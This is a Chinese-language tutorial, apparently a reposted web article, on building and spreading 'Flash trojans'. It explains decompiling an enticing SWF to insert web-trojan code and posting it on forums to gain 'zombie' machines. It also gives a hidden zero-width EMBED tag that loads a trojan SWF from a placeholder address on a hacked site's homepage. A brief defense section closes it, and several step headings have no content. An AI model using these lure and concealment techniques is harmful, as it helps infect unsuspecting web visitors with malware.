一、制作Flash动画木马的准备
另外,我们还需要准备一个比较吸引人的Flash动画文件“MM热舞.swf”,以及Flash动画反编译工具“闪客精灵”,编辑工具Macromedia Flash MX。
二、最原始的Flash木马
步骤一:反编译SWF动画
首先我们需要将要插入网页木马的Flash动画文件“MM热舞.swf”,反编译成可编辑的.fla格式。运行“闪客精灵”,点击菜单“文件”→“快速打开”命令,指定“MM热舞.swf”文件将其导入。然后点击工具栏上的“导出FLA”命令,将动画导出为“MM热舞.fla”文件。
步骤二:插入网页木马代码
步骤三:生成Flash木马
三、简简单单生成Flash木马
上面插入木马的过程比较麻烦,下面我们介绍一个简单的方法,也正是这些简单的工具使得Flash木马在网上随处可见。
四、Flash木马的利用
大部分的论坛中都可以发来Flash动画的帖子,利用论坛发帖,攻击者可以快速获得大量的肉鸡。以PHPWind v4.3.2 论坛为例,在发帖或回复时,点击编辑窗口上方的“插入Flash动画”按钮,设置Flash窗口大小,使用默认设置后,要求输入Flash的URL地址。确定后,可以看到编辑窗口中显示的代码为““(flash=400,300)hxxp://www.flash**.com.cn/upfiles/20067**.swf(/flash)””,这就是完整的Flash播放代码了,不同的论坛代码是不一样的。
攻击者入侵了某个大的网站之后,很可能在网站首页挂马,使用普通方式挂马会被管理员发觉,但是挂上Flash木马的话,是很难查杀的。攻击者可能在网页中插入如下代码:
“《EMBED src=http://网页木马地址/木马.swf width=0 height=0 type=application/x-shockwave-flash AUTOSTART="false" ShowStatusBar="false"》”,其中的《》改为<>。
这里的参数“width=0 height=0”表示,Flash播放窗口为零,也就是不显示Flash播放窗口。其它用户浏览网页时,就会莫名其妙的弹出一个木马网页窗口。
五、关于Flash木马的防范
其实不管Flash木马有多么的巧妙,最终都是要跳转到木马网页去的,也就是说我们最终要防范的还是网页木马。了解了思路,对于Flash动画木马就简单了:
首先,要开启Windows XP SP2的窗口拦截窗口功能,或安装其它防弹出窗口的插件。如果那个漏网之鱼,莫名其妙弹出的网页窗口要及时的关闭。另外,一定要在上网浏览时开启杀毒软件的网页监控功能,只要网页木马在后台一下载到本地硬盘,就会被杀毒软件查杀,这样就万事无忧了!
0 Comments